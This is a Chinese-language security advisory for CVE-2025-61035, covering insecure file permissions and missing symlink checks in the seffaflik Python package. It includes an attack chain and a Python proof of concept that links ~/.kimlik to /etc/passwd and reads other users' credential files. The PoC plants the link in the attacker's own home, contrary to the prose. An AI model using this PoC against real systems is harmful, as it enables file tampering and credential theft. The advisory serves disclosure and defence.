CVE-2025-61035：seffaflik包符号链接攻击导致信息泄露与拒绝服务

漏洞信息

漏洞编号

CVE-2025-61035

漏洞类型

符号链接攻击/不安全文件权限/任意文件覆盖

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

seffaflik（Python包）

漏洞概述

CVE-2025-61035是seffaflik Python包（版本至0.0.9）中存在的一个高危本地权限提升与文件覆盖漏洞。该漏洞源于seffaflik在创建敏感文件时使用了不安全的默认文件权限。具体而言，.kimlik文件以0777权限创建（即所有用户可读、可写、可执行），.seffaflik文件以0775权限创建（所有同组用户可读、可写、可执行），这使得包含身份验证凭据等敏感信息的密钥文件暴露给系统上的其他本地用户。更严重的是，.kimlik文件在写入时未进行符号链接检查（symlink check），这意味着本地攻击者可以预先创建指向系统关键文件（如/etc/passwd、/etc/shadow或其他重要配置文件）的符号链接，当seffaflik尝试写入.kimlik文件时，实际上会覆盖攻击者指定的任意目标文件，从而实现任意文件覆盖攻击。该漏洞可导致两种主要安全影响：一是信息泄露（其他本地用户可读取存储在.kimlik和.seffaflik文件中的密钥和敏感信息）；二是拒绝服务或权限提升（通过覆盖关键系统文件导致服务不可用或获取更高权限）。该漏洞的CVSS评分为7.7，属于高危级别，攻击向量为本地（AV:L），无需认证（PR:N）和用户交互（UI:N），完整性影响为高（I:H），可用性影响为高（A:H），机密性影响为低（C:L）。

技术细节

seffaflik是一个用于与土耳其e-Devlet（电子政府）公共服务API交互的Python库。该漏洞的核心技术问题在于文件创建时的权限设置和符号链接处理缺陷。

1. **不安全的文件权限**：当seffaflik首次运行时，会在用户主目录下创建.kimlik和.seffaflik两个文件用于存储身份认证信息。.kimlik文件以模式0777（即-rwxrwxrwx）创建，意味着系统上任何用户都可以读取该文件内容。.seffaflik文件以模式0775创建，允许同组用户读取。这些文件通常包含API密钥、令牌或其他敏感凭据。

2. **缺少符号链接检查（TOCTOU竞态条件）**：.kimlik文件在写入过程中未使用O_NOFOLLOW标志或os.path.realpath()等机制检查目标是否为符号链接。攻击者可以预先在目标路径创建一个指向系统关键文件（如/etc/passwd）的符号链接。当seffaflik进程以合法用户身份运行并尝试写入.kimlik文件时，内核将跟随符号链接并将数据写入攻击者指定的任意文件。

3. **利用方式**：本地攻击者无需特殊权限即可利用此漏洞。攻击者只需在目标用户运行seffaflik之前，在其主目录创建.kimlik符号链接指向敏感文件（如/etc/passwd），然后等待合法用户运行seffaflik命令即可触发文件覆盖。攻击者还可以直接读取其他用户的.kimlik文件获取凭据。

4. **影响范围**：该漏洞影响所有使用seffaflik <= 0.0.9版本的多用户系统，特别是在共享服务器环境（如大学实验室、云服务器）中风险更高。

攻击链分析

STEP 1

步骤1：环境侦察

本地攻击者识别目标系统上安装了seffaflik包（版本<=0.0.9），并确认系统为多用户环境，可访问其他用户的主目录。

STEP 2

步骤2：创建恶意符号链接

攻击者在目标用户的主目录路径下创建.kimlik符号链接，指向系统关键文件（如/etc/passwd、/etc/shadow或SSH授权密钥文件authorized_keys）。

STEP 3

步骤3：触发文件覆盖

等待合法用户运行seffaflik命令或脚本。由于.kimlik文件写入时未进行符号链接检查，seffaflik进程会将身份验证数据写入符号链接指向的目标文件，覆盖系统关键文件。

STEP 4

步骤4：实现攻击目标

根据覆盖的目标文件不同，攻击者可实现：覆盖/etc/passwd添加特权账户（权限提升）、覆盖SSH密钥文件获取远程访问（持久化）、覆盖关键配置文件导致服务崩溃（拒绝服务）。

STEP 5

步骤5：窃取敏感凭据（替代路径）

攻击者也可直接利用.kimlik文件0777权限读取其他用户的API密钥和认证令牌，用于未授权访问e-Devlet公共服务或其他关联系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-61035 - seffaflik symlink attack PoC
# This PoC demonstrates how a local attacker can exploit
# the insecure file permissions and missing symlink checks
# in seffaflik <= 0.0.9

import os
import sys

TARGET_FILE = os.path.expanduser("~/.kimlik")
SYMLINK_TARGET = "/etc/passwd"  # Arbitrary file to overwrite

def exploit_overwrite():
    """
    Step 1: Remove existing .kimlik file if present
    Step 2: Create a symlink from ~/.kimlik to a sensitive system file
    Step 3: Wait for victim to run seffaflik, which will write
            authentication data through the symlink, overwriting the target
    """
    # Clean up any existing file/symlink
    if os.path.exists(TARGET_FILE) or os.path.islink(TARGET_FILE):
        os.remove(TARGET_FILE)

    # Create symlink pointing to arbitrary file
    os.symlink(SYMLINK_TARGET, TARGET_FILE)
    print(f"[+] Symlink created: {TARGET_FILE} -> {SYMLINK_TARGET}")
    print("[+] Waiting for victim to run seffaflik...")
    print(f"[+] When seffaflik writes .kimlik, it will overwrite {SYMLINK_TARGET}")

def exploit_read_secrets():
    """
    Exploit 2: Read secrets from another user's .kimlik file
    since it is created with mode 0777 (world-readable)
    """
    target_users = ["/home/user1/.kimlik", "/home/user2/.kimlik"]
    for path in target_users:
        if os.path.exists(path):
            try:
                with open(path, 'r') as f:
                    content = f.read()
                print(f"[+] Read secrets from {path}:")
                print(content)
            except PermissionError:
                print(f"[-] Permission denied for {path}")

if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "read":
        exploit_read_secrets()
    else:
        exploit_overwrite()

影响范围

seffaflik <= 0.0.9

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）立即将现有.kimlik和.seffaflik文件权限修改为0600（chmod 600 ~/.kimlik ~/.seffaflik）；2）检查~/.kimlik是否为符号链接（ls -la ~/.kimlik），若为符号链接则删除并重新创建为普通文件；3）启用Linux内核的protected_symlinks保护（sysctl fs.protected_symlinks=1），防止非文件所有者或非特权用户跟随符号链接；4）在多用户环境中，避免使用共享账户运行seffaflik，限制其他用户对敏感目录的访问权限；5）监控关键系统文件（如/etc/passwd、/etc/shadow）的完整性，及时发现异常修改。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61035
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61035
3 Details https://www.cvedetails.com/cve/CVE-2025-61035/
4 VulDB https://vuldb.com/cve/CVE-2025-61035
5 Link https://github.com/nurisensoy/seffaflik
6 Link https://github.com/nurisensoy/seffaflik/issues/3
7 Link https://pypi.org/project/seffaflik/